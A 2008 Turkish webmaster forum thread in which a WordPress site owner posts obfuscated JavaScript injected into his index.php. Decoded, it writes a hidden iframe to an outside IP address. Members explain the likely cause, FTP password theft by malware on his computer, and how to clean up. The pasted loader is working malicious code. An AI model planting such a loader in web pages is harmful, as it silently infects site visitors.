Webmaster Forumu

Geri git   Webmaster Forumu > Webmaster Genel > Webmaster Genel Konular

Webmaster Genel Konular Webmaster Genel Konular


Cevapla
 
LinkBack (1) Seçenekler Stil
  1 links from elsewhere to this Post. Click to view. #1 (permalink)   eTicaret 
Alt 2008-07-03, 16:41
 
Üyelik tarihi: Feb 2008
Mesajlar: 222
eTicaret: %0/0
Rep Puanı: 1
efekentli is an unknown quantity at this point
Standart Wp sitemde virüs var yardım,lütfen

Merhaba arkadaşlar. Bugun birisinden mail aldım sitede virüs var diye firefox hiç uyarı vermiyor , internet explorereden girdim gerçekten sitemde virüs var. Bende diyorum hitler neden düştü.

Datebaseyi kontrol ettim bişey yok gibi ama index.php de söyle bir kod var :

Kod:
<script>
<!--
var d=document,kol=561;
function O10H486CC1D4F080B(H486CC1D4F1004){ var H486CC1D4F1803 = 16; return( parseInt(H486CC1D4F1004,H486CC1D4F1803));}function H486CC1D4F2813(H486CC1D4F300B){ function H486CC1D5005B5() {return 2;} var H486CC1D4F3804='';for(H486CC1D4F3FFC=0; H486CC1D4F3FFC<H486CC1D4F300B.length; H486CC1D4F3FFC+=H486CC1D5005B5()){ H486CC1D4F3804 += ( String.fromCharCode (O10H486CC1D4F080B(H486CC1D4F300B.substr(H486CC1D4F3FFC, H486CC1D5005B5()))));}return H486CC1D4F3804;} document.write(H486CC1D4F2813('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A323735373636292B27353861303638345C272077696474683D373739206865696768743D333534207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
//-->
</script>
Kesin virüs bu kodla alakalı ama bu kodu bir türlü bulamadım. index.php de ,headerde,footer.php de yok. Daha önce başınıza geldi mi böyle bişey ? Nerde olabilir bu kod ,yardımlarınızı rica ediyorum ( wp 2.3)


Alıntı ile Cevapla
Ucuz ürün ihaleleri
  #2 (permalink)   eTicaret 
Alt 2008-07-03, 17:11
TuRKuaZz - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Jan 2005
Nerden: Kerkük
Mesajlar: 620
eTicaret: %0/0
Rep Puanı: 1
TuRKuaZz is on a distinguished road
Standart

Bütün tema dosyalarını ve eklenti dosyalarını gözden geçir. Böyle birşey benim de başıma gelmişti. Genelde CHMod 777 verdiğin dosyalara bulaştırıyorlar.
__________________
Şeyh Şamilgiller'deniz, vız gelir apo deniz, dünyayı devirseniz, pusar mı sanırsınız?
Alıntı ile Cevapla
  #3 (permalink)   eTicaret 
Alt 2008-07-03, 17:17
 
Üyelik tarihi: Jul 2008
Mesajlar: 16
eTicaret: %0/0
Rep Puanı: 1
cannot is an unknown quantity at this point
Standart

dosyalarını gözden geçir,scriptte bir şey olmadığından emin değilsen host sahibine taratmasını iste..
Alıntı ile Cevapla
  #4 (permalink)   eTicaret 
Alt 2008-07-03, 17:20
 
Üyelik tarihi: Feb 2008
Mesajlar: 222
eTicaret: %0/0
Rep Puanı: 1
efekentli is an unknown quantity at this point
Standart

hala o kodları arıyorum ama bulamadım aramaya devam

bunun hakkında bilgisi olan var mı ? nerden nasıl bulaşır bu virüs ?
Alıntı ile Cevapla
  #5 (permalink)   eTicaret 
Alt 2008-07-03, 17:32
 
Üyelik tarihi: Feb 2008
Mesajlar: 222
eTicaret: %0/0
Rep Puanı: 1
efekentli is an unknown quantity at this point
Standart

çok ilginç bişey. wp admin panelindeki tema editöründen index.php e bakıyorum herhangi bir kod yok ama az önce ftpden dosyaları çektim.index.php de o kodu gördüm. Tekrar tema editöründen baktım o kod yok. Yani adam nasıl kod yerleştirmişse tema editöründe görünmüyor ancak ftpden indirip not defterinden açtığın zaman görünür. Acayip bişeymiş

Şimdi bundan sonra böyle bişeyle karşılaşmamak için ne yapmalı ?

Konu efekentli tarafından (2008-07-03 Saat 17:35 ) değiştirilmiştir..
Alıntı ile Cevapla
  #6 (permalink)   eTicaret 
Alt 2008-07-03, 17:52
TuRKuaZz - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Jan 2005
Nerden: Kerkük
Mesajlar: 620
eTicaret: %0/0
Rep Puanı: 1
TuRKuaZz is on a distinguished road
Standart

CHMod ayarlarını değiştirmelisin. Sadece okunur ayarlaman gerekli.
__________________
Şeyh Şamilgiller'deniz, vız gelir apo deniz, dünyayı devirseniz, pusar mı sanırsınız?
Alıntı ile Cevapla
  #7 (permalink)   eTicaret 
Alt 2008-07-03, 17:54
sempaty - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2005
Mesajlar: 2.188
Blog Entries: 1
eTicaret: %100/5
Rep Puanı: 1
sempaty is a jewel in the rough
Standart

bilgisayarına bulaşmış. o bilgisayardan başka ftp ye bağlanma. index.** gördüğü her dosyaya sızacaktır. temiz bir bilgisayardan ftp şifrelerini değiş, dosyaları temizleyip upload et. sonra virüslü bilgisayarını temizlemeye çalış. olmazsa format at..
__________________
HTTP 401 - Unauthorized for life
Alıntı ile Cevapla
  #8 (permalink)   eTicaret 
Alt 2008-07-03, 18:46
 
Üyelik tarihi: Feb 2008
Mesajlar: 222
eTicaret: %0/0
Rep Puanı: 1
efekentli is an unknown quantity at this point
Standart

bu bilgisayarımdaki dosyalara mı bulaşıyor yoksa direk ftpden bağlanıp ,oradaki indexphp dosyalarına mı bulaşıyor ? ( bilgisayarda çok var kontrol etmek işkence olur)
Alıntı ile Cevapla
  #9 (permalink)   eTicaret 
Alt 2008-07-03, 19:33
sempaty - ait Kullanıcı Resmi (Avatar)
 
Üyelik tarihi: Feb 2005
Mesajlar: 2.188
Blog Entries: 1
eTicaret: %100/5
Rep Puanı: 1
sempaty is a jewel in the rough
Standart

tahmin ettiğim ise, bağlandığın ftp lerin şifrelerini bilgisayarından alıyor ftp lere bağlanarak index isimli herhangi bir uzantılı her dosyaya <body> den sonrasına ekliyor (<body> yoksa başka bir yere ekliyor)

yani pcnde kaydedip yollamıyor. sadece bilgisayarındaki ftp şifrelerini ele geçiriyor.

bir zincir gibi. senin sitenden mesela benim pc ye ordan da sitelerime sızıyor. benim sitelerimden bir başkasınınkine vs.

genelde çin veya rus siteleri oluyor bu virüsü yayan
__________________
HTTP 401 - Unauthorized for life
Alıntı ile Cevapla
  #10 (permalink)   eTicaret 
Alt 2008-07-04, 01:48
 
Üyelik tarihi: Feb 2008
Mesajlar: 222
eTicaret: %0/0
Rep Puanı: 1
efekentli is an unknown quantity at this point
Standart

Alıntı:
sempaty´isimli üyeden Alıntı Mesajı göster
tahmin ettiğim ise, bağlandığın ftp lerin şifrelerini bilgisayarından alıyor ftp lere bağlanarak index isimli herhangi bir uzantılı her dosyaya <body> den sonrasına ekliyor (<body> yoksa başka bir yere ekliyor)

yani pcnde kaydedip yollamıyor. sadece bilgisayarındaki ftp şifrelerini ele geçiriyor.

bir zincir gibi. senin sitenden mesela benim pc ye ordan da sitelerime sızıyor. benim sitelerimden bir başkasınınkine vs.

genelde çin veya rus siteleri oluyor bu virüsü yayan
bahsettiğin gibi body den sonrasına eklenmiş. Firefoxda hiç farkına varmadım çünkü firefoxda virüs kodları aktif olamıyor. Rastgele birisi mail göndermese haberim olmayacaktı. Sitenin hitleri hala kendine gelmedi

( firefox'un güvenli olmasının zararı da bu olsa gerek .Sitene virüs bulaştığını bile fark edemiyosun )

Bilgiler için teşekkür ederim
Alıntı ile Cevapla
Cevapla


LinkBacks (?)
LinkBack to this Thread: http://forum.iyinet.com/webmaster-genel-konular/98745-wp-sitemde-virus-var-yardim-lutfen.html
Konuyu Başlatan For Type Tarih
Wp sitemde virüs var yardım,lütfen - Webmaster Forumu This thread Refback 2009-05-01 07:17

Konuyu Toplam 1 Üye okuyor. (0 Kayıtlı üye ve 1 Misafir)
 
Seçenekler
Stil


Benzer Konular
Konu Konuyu Başlatan Forum Cevaplar Son Mesaj
sitemde sql sorunu var yardım.. netistanbul Veritabanları 4 2006-09-26 21:40
sitemde sql hatası var acil yardım netistanbul PHP 3 2006-09-24 01:27
Web Sitemde Virüs :( Uurz Zararlı Yazılımlar ve Spam 22 2006-09-09 12:40
Virüs Yardım Plsss ! SempatiX Zararlı Yazılımlar ve Spam 16 2006-04-20 16:41
Virüs var, Yardım, PE_SPACES.1445 alonso İşletim sistemi 1 2002-12-07 23:07


Bütün Zaman Ayarları WEZ +2 olarak düzenlenmiştir. Şu Anki Saat: 18:06 .


Powered by vBulletin® Version 3.8.4
Copyright ©2000 - 2010, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.3.2
iyinet
Hosting sponsor Netinternet Datacenter
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241